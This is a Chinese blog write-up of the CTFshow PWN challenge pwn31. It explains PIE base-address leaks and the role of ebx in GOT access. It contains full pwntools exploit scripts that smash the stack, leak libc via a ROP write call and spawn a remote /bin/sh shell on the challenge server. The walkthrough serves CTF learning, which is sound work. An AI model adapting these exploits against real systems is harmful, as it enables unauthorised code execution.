深入分析CTFshow-PWN入门-pwn31的解法与原理

原创 于 2025-08-09 23:43:13 发布 · 361 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全

pwn31

这道题关于程序基址和调用约定中ebx的作用

image

checkse

image

32 位小端序,开启了 PIE 保护
程序基址 + 偏移地址 = 真实地址
关闭 pie 保护时,程序基址为默认值,也就是说可以直接得到函数的真实地址
开启 pie 保护后,每次运行都会有不一样的程序基址
回到题目
拖进 ida,反编译

image

发现这里泄露了 mian 函数的真实地址,可以用来计算程序基址
我们还是用 pwn25 题的脚本,只需要更改第一步

# -*- coding: utf-8 -*-							# 设置编码格式,用来在py2代码使用中文注释
from pwn import *								# 导入 pwntools 库
from LibcSearcher import *						# 导入 libcSearcher 库
context.log_level = 'debug'						# 设置日志级别为调试模式,显示详细信息
#io = process('./pwn')							# 本地连接
io = remote("pwn.challenge.ctf.show", 28294)	# 远程连接

# 1
elf = ELF('./pwn')								# 解析目标程序的 ELF 文件
main = int(io.recvline(),16)					# 接受程序泄露的 main 函数真实地址
base = main - elf.sym['main']					# 计算程序基址
ctfshow = base + elf.sym['ctfshow']				# 计算 ctfshow 的真实地址
write_got = base + elf.got['write']				# 计算 write@got 的真实地址
write_plt = base + elf.plt['write']				# 计算 write@plt 的真实地址

#2
payload1 = cyclic(0x88+0x4) + p32(write_plt) + p32(ctfshow) + p32(1) + p32(write_got) + p32(4)
io.sendline(payload1)							# 传入payload1

#3
write = u32(io.recv(4))							# 接收打印出来的 write 的真实地址(4 字节)
                                                # u32():将字节数据转换为无符号 32 位整数
print(hex(write))
libc = LibcSearcher('write',write)				# 根据 write的地址匹配远程 libc版本
libc_base = write - libc.dump('write')			# 计算 libc基地址

#4
system = libc_base + libc.dump('system')		# 计算 system 函数真实地址
bin_sh = libc_base + libc.dump('str_bin_sh')	# 计算 /bin/sh 字符串真实地址

#5
payload2 = cyclic(0x88+0x4) + p32(system) + p32(0) + p32(bin_sh)
io.sendline(payload2)							# 传入payload2
io.interactive()								# 进入交互模式,获得远程 shell

开启容器,运行

image

但是却提示没有合适的 libc 基址,泄露出来的write的真实地址是0x656d6974
libc 函数地址通常以0xf7xxxxxx0xf6xxxxxx开头,这一看就不是一个有效地址
那是什么原因导致了这个错误的地址?我们泄露思路肯定是没错的,问题出在细节上
我们打开 ctfshow 函数的汇编代码

image

这里就是问题所在,挑出重点部分逐行解释

push    ebx        								; 将 ebx 的原始值压栈保存(存到 [ebp-0x4])

...

call    __x86_get_pc_thunk_ax 					; 将下一条指令地址存入 eax
add     eax, (offset _GLOBAL_OFFSET_TABLE_ - $) ; eax += GOT 表与此指令的相对地址
                                                ;运行到这里,eax存的即是 GOT表 真实地址
...

mov     ebx, eax               					; 将 GOT 真实存入 ebx

...

mov     ebx, [ebp+var_4]  						; 从栈中恢复原始 ebx 值(var_4 = -4)

这种情况一般会出现在函数中需要使用 GOT 表地址的时候,简单来说就是主程序中 ebx 是有值的,在调用约定中 ebx 用来临时存放 GOT 表真实地址,方便函数使用,这时就会把 ebx 原来的值压入栈上先保存下来,让 ebx 临时储存 GOT 表的地址,函数结束时再恢复
我们刚刚的 payload1 中把 ebx 位置[ebp-0x4]覆盖成了“AAAA”,然后 write@plt 的跳转逻辑直接访问 GOT 表,无需 ebx参与,所以正确调用到了 write 函数
紧接着 ebx 带着错误的“AAAA”又去访问write@got地址,其结构大致如下

write@plt:
    jmp [ebx + write@got_offset]  ; 第一次跳转到 _dl_runtime_resolve
    push reloc_offset             ; 重定位条目索引
    jmp _dl_runtime_resolve       ; 解析真实地址并写入 GOT

也就是说,它是需要用 ebx 去计算的,ebx 正确才能泄露出正确的 write 的真实地址
而这里的 ebx,既不是“AAAA”,也不是要恢复成的原来主函数的 ebx 值,而是调用约定中 GOT 表的地址
所以这里我们应该把 ebx 还原成 GOT 表地址,通过我们算出的程序基址,再加上 GOT 表的偏移地址
即:ebx = base + 0x1fc0,偏移地址在 ida 里用快捷键Ctrl+S查看

image

综上所述,正确的 payload1 应该是:payload1 = b"A" * 132 + p32(ebx) + b"AAAA" + p32(write_plt) + p32(ctfshow) + p32(1) + p32(write_got) + p32(4),其栈帧如下:

偏移范围填充内容对应栈帧区域作用说明
[ebp+0x88]→[ebp+0x04]b"A" * 132缓冲区填充覆盖局部变量和栈空间,直到覆盖保存的 ebx 前(需对齐到 ebp-0x4
[ebp-0x4]p32(ebx)保存的 ebx覆盖函数保存的原始 ebx(需合法值,否则 mov ebx, [ebp-0x4] 会崩溃)
[ebp]b"AAAA"旧的 ebp覆盖栈帧指针(通常可随意填充)
[ebp+0x4]p32(write_plt)返回地址劫持控制流,跳转到 write@plt
[ebp+0x8]p32(ctfshow)write 的返回地址write 执行后返回到 ctfshow 函数(或其他合法地址)
[ebp+0xC]p32(1)write 参数1:fdfd=1(标准输出)
[ebp+0x10]p32(write_got)write 参数2:buf要泄露的地址(write@got 的地址)
[ebp+0x14]p32(4)write 参数3:len读取 4 字节(write 的返回值)

最终的 exp

# -*- coding: utf-8 -*-							# 设置编码格式,用来在py2代码使用中文注释
from pwn import *								# 导入 pwntools 库
from LibcSearcher import *						# 导入 libcSearcher 库
context.log_level = 'debug'						# 设置日志级别为调试模式,显示详细信息
#io = process('./pwn')							# 本地连接
io = remote("pwn.challenge.ctf.show", 28294)	# 远程连接

# 1
elf = ELF('./pwn')								# 解析目标程序的 ELF 文件
main = int(io.recvline(),16)					# 接受程序泄露的 main 函数真实地址
base = main - elf.sym['main']					# 计算程序基址
ctfshow = base + elf.sym['ctfshow']				# 计算 ctfshow 的真实地址
write_got = base + elf.got['write']				# 计算 write@got 的真实地址
write_plt = base + elf.plt['write']				# 计算 write@plt 的真实地址
ebx = base + 0x1fc0								# 将ebx恢复为GOT表真实地址

#2
payload1 = b"A" * 132 + p32(ebx) + b"AAAA" + p32(write_plt) + p32(ctfshow) + p32(1) + p32(write_got) + p32(4)
io.sendline(payload1)							# 传入payload1

#3
write = u32(io.recv(4))							# 接收打印出来的 write 的真实地址(4 字节)
                                                # u32():将字节数据转换为无符号 32 位整数
libc = LibcSearcher('write',write)				# 根据 write的地址匹配远程 libc版本
libc_base = write - libc.dump('write')			# 计算 libc基地址

#4
system = libc_base + libc.dump('system')		# 计算 system 函数真实地址
bin_sh = libc_base + libc.dump('str_bin_sh')	# 计算 /bin/sh 字符串真实地址

#5
payload2 = b"A" * 140 + p32(system) + p32(0) + p32(bin_sh)
io.sendline(payload2)							# 传入payload2
io.interactive()								# 进入交互模式,获得远程 shell

最后一步~运行运行运行…………

image

终于拿到 fla

CTFshow-PWN入门-前置基础-全篇
weixin_63576152的博客
07-31 5532
本文主要详解CTFshowpwn入门系列的前置基础模块,共30道题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope的博客以下操作中小编用的都是自己的kali环境。
CTFSHOW-PWN入门-栈溢出(35-42)
2402_84585385的博客
10-09 1034
发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x80487BA。发现hint函数中存在system函数,useful函数存在sh,根据题目的提示得知或许sh可以替代bin/sh,找到sh的地址为0x400872。ctfshow函数中的,v1大小为14,而read函数读取大小为50,所以read函数存在栈溢出,使用cyclic计算栈偏移量为22。ctfshow函数中的read函数存在栈溢出,cyclic计算栈偏移量为18。
深入分析CTFshow-PWN入门-pwn23的解法原理
最新发布
weixin_44031316的博客
08-09 207
这一题相较之前题目难度跨度较大,对挨着做题的同学很不友好 此文章简单解释了代码逻辑和栈溢出崩溃的原理,希望对入门者有帮助
CTFshow-pwn入门-前置基础pwn26-pwn28
你们de4月天的博客
06-20 1219
CTFshow-pwn入门-pwn26-pwn28
ctfshow-PWN入门-pwn68
GScloud41的博客
09-18 820
通过官方wp捋顺了思路,参考了大佬的wp进一步学习,写自己的wp。
CTFSHOW-PWN入门-前置基础(29-34)
2402_84585385的博客
08-03 1954
观察源代码发现printf函数输出了main函数的地址,我们用输出的地址减去main函数的地址就得到了偏移量,然后再用其他函数的地址加上偏移量,就能知道函数在内存中的地址了。进而我们可以利用puts函数输出got表中puts函数的地址,利用LibcSearcher模块得到puts函数在libc中的偏移,然后就能得到system函数和/bin/sh的地址了,最终拿到shell,得到flag。本题代码和上题一样,但是开启了fortify=1,仅仅在编译时检查,所以还是输入4个参数,得到flag。
CTFshow-pwn入门-栈溢出 (慢慢更
akdelt的博客
01-31 3879
当应用程序试图对无权访问的内存地址进行读写操作时,会调用 sigsegv_handler 函数,sigsegv_handler 函数 会把stderr打印输出,即将flag的值打印输出那么我们直接输入超长数据就会溢出,程序就会崩溃进而打印出flag。char dest;该函数无法限制输入的长度,可能会超出s数组的容量,导致覆盖栈上的其他数据或执行任意代码。这也是明显的栈溢出漏洞,且提供后门函数 get_flag()堆栈不可执行,不过有后门函数,跟进 ctfshow 函数,read 可以读取 50 个字节。
ctfshow--pwn入门--栈溢出
pandasaymmm的博客
06-21 407
这题像极了pwn23 代码就是判断我们输入的参数是否大于1,如果大于1进入ctfshow()函数并且将我们输入的第一个参数作为ctfshow函数的参数。ctfshow函数用到了strcpy()函数,而这个函数是可以发生溢出的。
CTFshow-pwn入门-前置基础pwn5 - pwn12
2301_80976241的博客
12-04 1108
这一部分主要是了解一些寄存器、寻址方式。
CTFshow-pwn入门-前置基础pwn23-pwn25
你们de4月天的博客
06-19 2531
CTFshow-pwn入门-前置基础pwn23-pwn25
CTFshow-pwn入门-前置基础pwn13-pwn19
2301_80976241的博客
12-06 1384
题目提示我们使用gcc直接编译,然后运行可执行文件即可得到flag。因此我们gcc编译一下。得到flag:ctfshow{hOw_t0_us3_GCC?
CTFSHOW-PWN入门-前置基础(pwn5-pwn12)
2402_84133101的博客
04-13 592
mov eax,[esi]将esi中的值作为地址,然后将该地址单元的值赋给eax,即找到080490E8地址单元中的值赋给eax。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov ecx,msg将msg的地址赋值给ecx,此时ecx寄存器的值为0x80490E8。mov eax,[ecx]将ecx寄存器的值作为地址,将该地址单元中的值赋给eax。
CTFshow-PWN入门-栈溢出pwn35~pwn40
weixin_63576152的博客
08-22 1635
本文主要详解CTFshowpwn入门系列的栈溢出模块的前6题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope参考文章:以下操作中小编用的都是自己的kali环境。
CTFshow-PWN入门-栈溢出pwn41~pwn48
weixin_63576152的博客
08-25 2454
本文主要详解CTFshowpwn入门系列的栈溢出模块的其中x题所用工具:linux环境下的虚拟机、IDA Pro、exeinfope以下操作中小编用的都是自己的kali环境。
一文解读,网络安全行业人才需求情况《网络安全产业人才发展报告》
weixin_59086772的博客
10-18 8745
随着近几天国家网络安全宣传周在全国各地开展活动,网络安全再一次成为热门话题。网络安全不再缩在小小的安全圈子里,惠及面越来越广。不少对网络安全颇有兴趣的朋友非常关心行业前景如何?该怎么提升自我能力,更快地加入网安行列。 今天雨笋君就10月13日在网络安全宣传周上发布的《2021网络安全人才报告》进行一个简单的行业前景分析。 一、网络安全行业市场发展情况 网络时代生活越来越离不开网络,此同时发生的网络安全攻击事件、非法入侵等等一系列事件都威胁着普通人的生活。没有网络安全保障,个人和企业等重.
基于双向长短期记忆网络(BILSTM)的MATLAB数据分类预测代码实现应用
08-09
基于双向长短期记忆网络(BILSTM)的数据分类预测技术及其在MATLAB中的实现方法。首先解释了BILSTM的工作原理,强调其在处理时间序列和序列相关问题中的优势。接着讨论了数据预处理的重要性和具体步骤,如数据清洗、转换和标准化。随后提供了MATLAB代码示例,涵盖从数据导入到模型训练的完整流程,特别指出代码适用于MATLAB 2019版本及以上。最后总结了BILSTM模型的应用前景和MATLAB作为工具的优势。 适合人群:对机器学习尤其是深度学习感兴趣的科研人员和技术开发者,特别是那些希望利用MATLAB进行数据分析和建模的人群。 使用场景及目标:①研究时间序列和其他序列相关问题的有效解决方案;②掌握BILSTM模型的具体实现方式;③提高数据分类预测的准确性。 阅读建议:读者应该具备一定的编程基础和对深度学习的理解,在实践中逐步深入理解BILSTM的工作机制,并尝试调整参数以适应不同的应用场景。
路径规划人工势场法及其改进Matlab代码,包括斥力引力合力势场图,解决机器人目标点徘徊问题
08-09
用于机器人路径规划的传统人工势场法及其存在的问题,并提出了一种改进方法来解决机器人在接近目标点时出现的徘徊动荡现象。文中提供了完整的Matlab代码实现,包括引力场、斥力场和合力场的计算,以及改进后的斥力公式引入的距离衰减因子。通过对比传统和改进后的势场图,展示了改进算法的有效性和稳定性。此外,还给出了主循环代码片段,解释了关键参数的选择和调整方法。 适合人群:对机器人路径规划感兴趣的科研人员、工程师和技术爱好者,尤其是有一定Matlab编程基础并希望深入了解人工势场法及其改进算法的人群。 使用场景及目标:适用于需要进行机器人路径规划的研究项目或应用场景,旨在提高机器人在复杂环境中导航的能力,确保其能够稳定到达目标点而不发生徘徊或震荡。 其他说明:本文不仅提供理论解析,还包括具体的代码实现细节,便于读者理解和实践。建议读者在学习过程中结合提供的代码进行实验和调试,以便更好地掌握改进算法的应用技巧。
基于LBP特征DBN算法的人脸识别MATLAB程序实现及优化
08-09
基于LBP特征深度信念网络(DBN)的人脸识别MATLAB程序。该程序利用LBP进行特征提取,构建了一个四层DBN模型,其中包括三层隐含层和一层输出层。通过RBM预训练和BP反向传播算法微调,实现了高精度的人脸识别,准确率达到98%,错误率为1.67%。此外,程序还包括学习曲线绘制功能,用于调整正则化参数和其他超参数,以优化模型性能。 适合人群:对机器学习、深度学习以及人脸识别感兴趣的科研人员和技术开发者。 使用场景及目标:适用于需要高效人脸识别的应用场景,如安防监控、身份验证等。主要目标是提高人脸识别的准确性和效率,同时提供详细的代码实现和优化技巧。 其他说明:文中提到的ORL数据库已做对齐处理,直接应用LBP可能会导致一定的误差。硬件方面,程序在i7 CPU上运行约需半小时完成一次完整的训练。为加快速度,可以考虑将RBM预训练改为GPU版本,但需额外配置MATLAB的并行计算工具箱。
三菱FX3U六轴标准程序:实现3轴本体控制3个1PG定位模块,轴点动控制、回零控制及定位功能,搭配气缸DD马达转盘的多工位流水作业方式
08-09
三菱FX3U PLC的六轴控制程序,涵盖本体三轴和扩展的三个1PG定位模块的控制。程序实现了轴点动、回零、相对定位和绝对定位等功能,并集成了多个气缸和一个由DD马达控制的转盘,用于转盘多工位流水作业。文中展示了部分核心代码,解释了各个功能的具体实现方法和技术细节。同时,强调了该程序在工业自动化领域的广泛应用及其重要性。 适合人群:从事工业自动化领域的工程师和技术人员,尤其是熟悉三菱PLC编程的专业人士。 使用场景及目标:适用于需要实现复杂多轴控制和流水线作业自动化的工业环境,如制造业生产线。目标是提高生产效率和精度,减少人工干预。 其他说明:该程序不仅展示了具体的编程技巧,还提供了对系统架构和逻辑控制的理解,有助于进一步优化和扩展工业自动化解决方案。
CTFSHOW-PWN入门 pwn5
01-10
### CTF SHOW PWN入门 pwn5 解法 对于CTF SHOW平台上的PWN挑战,尤其是针对`pwn5`这一题目,解决方法通常涉及对二进制漏洞的理解以及如何利用这些漏洞来获取flag。 #### 题目分析 在处理这类问题时,首先需要下载并理解目标程序的行为模式。通过逆向工程工具如IDA Pro或Ghidra可以查看可执行文件内部结构,识别潜在的安全缺陷[^1]。 #### 漏洞发现 经过初步审查后得知此题存在栈溢出的可能性。当输入长度超过缓冲区大小时未作适当检查便直接复制到固定空间内,这使得攻击者能够覆盖返回地址从而控制EIP寄存器指向任意位置执行恶意代码片段[^2]。 #### 利用技巧 为了成功完成该关卡,需构建特定格式的数据包作为输入发送给服务端进程。这里采用的方法是构造ROP链(Return-Oriented Programming Chain),即精心挑选一系列现有指令序列组合起来实现所需功能而不必注入额外shellcode: ```python from pwn import * context(os="linux", arch="amd64") binary_path = './path_to_binary' elf = ELF(binary_path) # 远程连接设置 host, port = "remote_host", 1234 conn = remote(host, int(port)) # 构造payload offset = ... # 计算偏移量 ret_address = ... pop_rdi_ret_gadget = ... payload = b'A' * offset + \ p64(pop_rdi_ret_gadget) + \ p64(target_function_arg) + \ p64(ret_address) conn.recvuntil(b'Tell me your name:') conn.sendline(payload) ``` 上述Python脚本展示了基本框架,实际应用中还需根据具体情况调整参数值,比如计算正确的偏移量(offset),找到合适的gadgets等[^3]。 #### 获取Flag 一旦成功触发了预期行为,则可以通过读取内存中的字符串或其他方式获得最终答案。例如,在某些情况下可能需要解析动态链接库表项以定位标准I/O函数的实际映射地址,进而打印出隐藏信息;而在另一些场景下则可能是直接调用了puts()之类的API输出预设好的标志位[^4]。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值